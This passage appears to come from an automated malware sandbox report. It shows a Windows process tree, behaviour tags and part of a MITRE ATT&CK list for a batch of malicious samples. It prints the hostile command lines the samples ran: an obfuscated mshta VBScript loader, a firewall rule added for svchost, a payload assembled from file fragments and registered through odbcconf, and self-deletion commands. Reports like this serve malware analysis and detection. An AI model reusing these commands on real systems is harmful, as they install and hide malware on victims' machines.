                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9328
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" start hocgsksw
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6344
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6028
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0275.bat" "
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3300
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7672
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1B35.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1B35.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1764
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1B35.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\1B35.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5352
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2D85.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2D85.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4188
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4227.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\4227.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9236
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4864
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7FCE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7FCE.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8332
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\9A6B.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\9A6B.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10000
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9A6B.exe" & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3864
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                timeout /t 5
                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7308
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A7F9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\A7F9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4820
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1616.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1616.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5408
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1616.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1616.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10740
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\QfseWnwbRox1BnG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\QfseWnwbRox1BnG.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8592
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\QfseWnwbRox1BnG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "{path}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11224
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\QfseWnwbRox1BnG.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "{path}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11252
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\NortonSecurity.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\NortonSecurity.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5556
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\FinderFile_2021-11-25_16-07.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\FinderFile_2021-11-25_16-07.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:392
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B596.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B596.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4504
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        #cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9184
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        regsvr32 /s C:\Users\Admin\AppData\Local\Temp\C4F9.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5100
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D304.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D304.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7164
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:620
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E1D9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\E1D9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8788
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3636
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:188
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8096
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding D1DF933B0D9C45ED81C2DF7005AB430B C
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1408
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10856
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11032
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10364
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6992
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\C4F9.dll,DllRegisterServer {4E12F5C2-A483-4F4D-9B36-6D63E9E27A76}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7476
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\35D2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\35D2.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBscRIpt: ClOSe( CReateobJeCT ( "wsCriPt.SheLl" ).RUn ( "CmD.EXE /Q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\35D2.exe"" ..\UrypR.Exe && sTaRt ..\UrYpR.eXE /Pit8g72KNCc6Yq6eYM_ & iF """" == """" for %D In ( ""C:\Users\Admin\AppData\Local\Temp\35D2.exe"") do taskkill /iM ""%~nXD"" -F " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\35D2.exe" ..\UrypR.Exe && sTaRt ..\UrYpR.eXE /Pit8g72KNCc6Yq6eYM_ & iF "" == "" for %D In ("C:\Users\Admin\AppData\Local\Temp\35D2.exe") do taskkill /iM "%~nXD" -F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\UrypR.Exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          ..\UrYpR.eXE /Pit8g72KNCc6Yq6eYM_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vBscRIpt: ClOSe( CReateobJeCT ( "wsCriPt.SheLl" ).RUn ( "CmD.EXE /Q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\UrypR.Exe"" ..\UrypR.Exe && sTaRt ..\UrYpR.eXE /Pit8g72KNCc6Yq6eYM_ & iF ""/Pit8g72KNCc6Yq6eYM_ "" == """" for %D In ( ""C:\Users\Admin\AppData\Local\Temp\UrypR.Exe"") do taskkill /iM ""%~nXD"" -F " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\UrypR.Exe" ..\UrypR.Exe && sTaRt ..\UrYpR.eXE /Pit8g72KNCc6Yq6eYM_ & iF "/Pit8g72KNCc6Yq6eYM_ " == "" for %D In ("C:\Users\Admin\AppData\Local\Temp\UrypR.Exe") do taskkill /iM "%~nXD" -F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbScRIPt: cLoSe (CrEAtEobjeCt ("wsCRipt.shelL"). rUN ( "cmd.Exe /q /c eCho C:\Users\Admin\AppData\RoaminglzD> P7XPZ.C & EchO | set /p = ""MZ"" > gML3DV.HdT & COPy /B /y GML3DV.HDT+ Ar8TY.R + eQZHV.s + K4IAIUE.ST + ZLlE.Xr~+ V~5XOR.V+ vXyr.AT+ P7xpZ.C ..\LB4C.NFm & del /Q *& STARt odbcconf.exe -A { RegsVr ..\lb4C.NFm } ",0 , tRUE ))
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /q /c eCho C:\Users\Admin\AppData\RoaminglzD> P7XPZ.C & EchO | set /p = "MZ" > gML3DV.HdT & COPy /B /y GML3DV.HDT+ Ar8TY.R + eQZHV.s + K4IAIUE.ST + ZLlE.Xr~+ V~5XOR.V+ vXyr.AT+ P7xpZ.C ..\LB4C.NFm & del /Q *& STARt odbcconf.exe -A { RegsVr ..\lb4C.NFm }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" EchO "
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>gML3DV.HdT"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\odbcconf.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              odbcconf.exe -A { RegsVr ..\lb4C.NFm }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10556
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          taskkill /iM "35D2.exe" -F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4E4C.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\4E4C.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10588
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im 4E4C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4E4C.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          taskkill /im 4E4C.exe /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\658E.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\658E.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Accesses Microsoft Outlook profiles
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • outlook_office_path
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • outlook_win_path
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9472

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        New Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1050

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        New Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1050

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Credential Access

